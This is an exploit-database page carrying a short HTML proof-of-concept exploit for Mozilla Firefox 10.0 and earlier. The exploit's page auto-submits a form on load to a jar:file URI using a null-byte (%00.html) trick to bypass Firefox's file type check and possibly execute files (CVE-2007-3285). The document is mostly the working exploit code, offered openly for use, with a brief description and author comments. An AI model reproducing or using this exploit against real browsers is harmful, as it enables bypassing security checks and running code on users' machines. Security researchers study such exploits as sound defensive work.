-
Todor Donev on February 8, 2012
- Platforms
- multiple
- Category
- remote
- Tags
- null firefox file mozilla exploit bypass byte execution local check
- Source
- exploit-db.com
- Download
-
Exploit Code
Vulnerable App
mozilla firefox <= 10.0 local null byte bypass file check execution exploit
<!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit --> <!-- --> <!-- Vuln risk level: Medium --> <!-- Author: Todor Donev --> <!-- Author mail: todor.donev@@gmail.com --> <!-- --> <!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: --> <!-- URI with a dangerous extension.--> <!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more --> <!-- --> <!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN --> <!-- --> <!-- Greetz Tsvetelina Emirska again.. =) --> <!-- --> <html> <body onLoad=javascript:document.form.submit()> <form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form"> </form> </body> </html> <!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->
Comments
blog comments powered by Disqus